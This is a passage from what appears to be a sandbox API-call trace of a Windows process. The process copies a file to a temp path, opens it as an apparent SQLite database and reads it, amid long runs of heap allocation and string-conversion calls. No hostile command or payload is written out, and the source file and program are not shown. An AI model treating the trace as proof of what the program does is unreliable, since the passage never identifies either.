lpNewFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp"), bFailIfExists=0) returned 1 [0162.580] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x28) returned 0x39297d0 [0162.580] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x28 [0162.586] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xb5) returned 0x3929800 [0162.586] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929800) returned 0xb5 [0162.586] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929800) returned 0xb5 [0162.592] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d8) returned 0x39298c0 [0162.592] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39298c0) returned 0x1d8 [0162.599] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x3929aa0 [0162.599] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929aa0) returned 0x43 [0162.599] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a888 [0162.599] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a888) returned 0x10 [0162.599] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x43) returned 0x3929af0 [0162.599] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929af0) returned 0x43 [0162.599] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a870 [0162.599] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a870) returned 0x10 [0162.599] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x42) returned 0x3929b40 [0162.599] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b40) returned 0x42 [0162.599] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a858 [0162.599] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a858) returned 0x10 [0162.599] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2f) returned 0x3929b90 [0162.599] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b90) returned 0x2f [0162.605] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x30) returned 0x3929bc8 [0162.605] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929bc8) returned 0x30 [0162.605] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x3929c00 [0162.605] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c00) returned 0x54 [0162.614] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x822) returned 0x3929c60 [0162.614] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x822 [0162.621] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929b90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0162.621] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x392a490 [0162.621] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a490) returned 0x5c [0162.621] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3929b90, cbMultiByte=-1, lpWideCharStr=0x392a490, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp") returned 46 [0162.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x2e [0162.621] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x62) returned 0x395b8c8 [0162.621] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x62 [0162.621] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp", nBufferLength=0x31, lpBuffer=0x395b8c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp", lpFilePart=0x0) returned 0x2d [0162.621] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a490) returned 0x5c [0162.621] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a490 | out: hHeap=0x2dc0000) returned 1 [0162.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0162.621] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x2e) returned 0x392a490 [0162.621] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a490) returned 0x2e [0162.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp", cchWideChar=-1, lpMultiByteStr=0x392a490, cbMultiByte=46, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp", lpUsedDefaultChar=0x0) returned 46 [0162.621] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x62 [0162.621] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0162.621] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a490) returned 0x2e [0162.621] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a490 | out: hHeap=0x2dc0000) returned 1 [0162.621] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x281) returned 0x392a490 [0162.621] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a490) returned 0x281 [0162.628] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x822 [0162.628] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c60 | out: hHeap=0x2dc0000) returned 1 [0162.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a678, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0162.628] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5c) returned 0x3929c60 [0162.628] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x5c [0162.628] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a678, cbMultiByte=-1, lpWideCharStr=0x3929c60, cchWideChar=46 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp") returned 46 [0162.628] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp"), fInfoLevelId=0x0, lpFileInformation=0x2df10c | out: lpFileInformation=0x2df10c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe42cd6b0, ftCreationTime.dwHighDateTime=0x1d59514, ftLastAccessTime.dwLowDateTime=0xe42cd6b0, ftLastAccessTime.dwHighDateTime=0x1d59514, ftLastWriteTime.dwLowDateTime=0x8124f5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x4800)) returned 1 [0162.628] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0162.628] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x5c [0162.628] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c60 | out: hHeap=0x2dc0000) returned 1 [0162.634] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1000) returned 0x392af68 [0162.634] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x1000 [0162.634] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x1000 [0162.635] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x3929c60 [0162.635] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x74 [0162.635] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x3929ce0 [0162.635] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ce0) returned 0x400 [0162.635] ReadFile (in: hFile=0x160, lpBuffer=0x2df22c, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x2df1d4, lpOverlapped=0x2df1b4 | out: lpBuffer=0x2df22c*, lpNumberOfBytesRead=0x2df1d4*=0x64, lpOverlapped=0x2df1b4) returned 1 [0162.641] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x800) returned 0x392bf70 [0162.641] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x800 [0162.641] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392bf70) returned 0x800 [0162.641] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x74) returned 0x392a0e8 [0162.641] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a0e8) returned 0x74 [0162.641] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x400) returned 0x392c778 [0162.641] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392c778) returned 0x400 [0162.641] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929ce0) returned 0x400 [0162.641] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929ce0 | out: hHeap=0x2dc0000) returned 1 [0162.642] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x74 [0162.642] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c60 | out: hHeap=0x2dc0000) returned 1 [0162.642] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x1000 [0162.642] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af68) returned 0x1000 [0162.642] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af68 | out: hHeap=0x2dc0000) returned 1 [0162.648] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a168 [0162.648] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a168) returned 0x54 [0162.648] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x54) returned 0x392a1c8 [0162.648] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a1c8) returned 0x54 [0162.679] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x22) returned 0x392a720 [0162.679] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a720) returned 0x22 [0162.679] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a840 [0162.679] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a840) returned 0x10 [0162.686] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1d4c0) returned 0x392cb80 [0162.686] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392cb80) returned 0x1d4c0 [0162.686] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392cb80) returned 0x1d4c0 [0162.686] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b90) returned 0x2f [0162.686] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b90 | out: hHeap=0x2dc0000) returned 1 [0162.686] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929800) returned 0xb5 [0162.686] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929800 | out: hHeap=0x2dc0000) returned 1 [0162.686] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x28 [0162.686] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x39297d0 | out: hHeap=0x2dc0000) returned 1 [0162.706] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a7f8 [0162.706] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7f8) returned 0xe [0162.706] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x39297d0 [0162.706] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39297d0) returned 0x50 [0162.706] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a810 [0162.706] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a810) returned 0xa [0162.706] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x3929828 [0162.706] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929828) returned 0x80 [0162.706] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xa) returned 0x392a7e0 [0162.706] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7e0) returned 0xa [0162.706] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe) returned 0x392a7b0 [0162.706] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7b0) returned 0xe [0162.706] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xd) returned 0x392a798 [0162.706] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a798) returned 0xd [0162.707] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x9) returned 0x392a780 [0162.707] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a780) returned 0x9 [0162.713] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a7c8 [0162.713] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a7c8) returned 0x10 [0162.719] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x392a228 [0162.719] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a228) returned 0xe0 [0162.725] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3929c60 [0162.725] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x3fc [0162.725] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x3fc [0162.735] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x3fc [0162.735] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c60 | out: hHeap=0x2dc0000) returned 1 [0162.735] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a228) returned 0xe0 [0162.735] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a228 | out: hHeap=0x2dc0000) returned 1 [0162.735] LockFileEx (in: hFile=0x160, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de7c0 | out: lpOverlapped=0x2de7c0) returned 1 [0162.735] LockFileEx (in: hFile=0x160, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x2de7b4 | out: lpOverlapped=0x2de7b4) returned 1 [0162.735] UnlockFileEx (in: hFile=0x160, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x2de7c4 | out: lpOverlapped=0x2de7c4) returned 1 [0162.736] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6a7, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0162.736] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x6c) returned 0x392a228 [0162.736] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a228) returned 0x6c [0162.736] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6a7, cbMultiByte=-1, lpWideCharStr=0x392a228, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-journal") returned 54 [0162.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-journal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp-journal"), fInfoLevelId=0x0, lpFileInformation=0x2de7c4 | out: lpFileInformation=0x2de7c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.736] GetLastError () returned 0x2 [0162.736] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a228) returned 0x6c [0162.736] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a228 | out: hHeap=0x2dc0000) returned 1 [0162.736] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6dd, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0162.736] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x64) returned 0x395b8c8 [0162.736] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.736] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x392a6dd, cbMultiByte=-1, lpWideCharStr=0x395b8c8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-wal") returned 50 [0162.736] GetFileAttributesExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\6DA1.tmp-wal" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\6da1.tmp-wal"), fInfoLevelId=0x0, lpFileInformation=0x2de7d4 | out: lpFileInformation=0x2de7d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0162.736] GetLastError () returned 0x2 [0162.736] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395b8c8) returned 0x64 [0162.736] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x395b8c8 | out: hHeap=0x2dc0000) returned 1 [0162.736] GetFileSize (in: hFile=0x160, lpFileSizeHigh=0x2de800 | out: lpFileSizeHigh=0x2de800*=0x0) returned 0x4800 [0162.742] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xac80) returned 0x395c8b0 [0162.742] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0xac80 [0162.742] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x395c8b0) returned 0xac80 [0162.742] ReadFile (in: hFile=0x160, lpBuffer=0x3966c90, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2de7dc, lpOverlapped=0x2de7bc | out: lpBuffer=0x3966c90*, lpNumberOfBytesRead=0x2de7dc*=0x800, lpOverlapped=0x2de7bc) returned 1 [0162.775] _aulldvrm () returned 0x0 [0162.776] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x5) returned 0x39298b0 [0162.776] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x39298b0) returned 0x5 [0162.776] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x392a228 [0162.776] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a228) returned 0x50 [0162.776] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a828 [0162.776] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a828) returned 0x10 [0162.776] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x80) returned 0x392a280 [0162.776] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a280) returned 0x80 [0162.782] _aulldvrm () returned 0x0 [0162.782] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x3929b90 [0162.782] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b90) returned 0x18 [0162.782] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x34) returned 0x392af80 [0162.782] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.782] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x392a308 [0162.782] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a308) returned 0x1c [0162.782] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x70) returned 0x392a330 [0162.782] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a330) returned 0x70 [0162.783] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a8a0 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8a0) returned 0x10 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.783] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af80 | out: hHeap=0x2dc0000) returned 1 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a308) returned 0x1c [0162.783] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a308 | out: hHeap=0x2dc0000) returned 1 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929b90) returned 0x18 [0162.783] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929b90 | out: hHeap=0x2dc0000) returned 1 [0162.783] _aulldvrm () returned 0x0 [0162.783] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x18) returned 0x392a308 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a308) returned 0x18 [0162.783] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x34) returned 0x392af80 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.783] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x1c) returned 0x394a060 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a060) returned 0x1c [0162.783] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x70) returned 0x392a3a8 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3a8) returned 0x70 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3a8) returned 0x70 [0162.783] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a3a8 | out: hHeap=0x2dc0000) returned 1 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392af80) returned 0x34 [0162.783] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392af80 | out: hHeap=0x2dc0000) returned 1 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x394a060) returned 0x1c [0162.783] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x394a060 | out: hHeap=0x2dc0000) returned 1 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a308) returned 0x18 [0162.783] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a308 | out: hHeap=0x2dc0000) returned 1 [0162.783] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x12) returned 0x392a308 [0162.783] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a308) returned 0x12 [0162.783] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x10) returned 0x392a8b8 [0162.784] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a8b8) returned 0x10 [0162.784] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0xe0) returned 0x392a3a8 [0162.784] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3a8) returned 0xe0 [0162.784] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x3fc) returned 0x3929c60 [0162.784] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x3fc [0162.784] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x3fc [0162.784] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x3929c60) returned 0x3fc [0162.784] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x3929c60 | out: hHeap=0x2dc0000) returned 1 [0162.784] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3a8) returned 0xe0 [0162.784] HeapFree (in: hHeap=0x2dc0000, dwFlags=0x0, lpMem=0x392a3a8 | out: hHeap=0x2dc0000) returned 1 [0162.790] _aulldvrm () returned 0x0 [0162.790] _aulldvrm () returned 0x0 [0162.790] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x7) returned 0x392a750 [0162.790] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a750) returned 0x7 [0162.790] RtlAllocateHeap (HeapHandle=0x2dc0000, Flags=0x0, Size=0x50) returned 0x392a3a8 [0162.790] RtlSizeHeap (HeapHandle=0x2dc0000, Flags=0x0, MemoryPointer=0x392a3a8) returned 0x50 [0162.790] 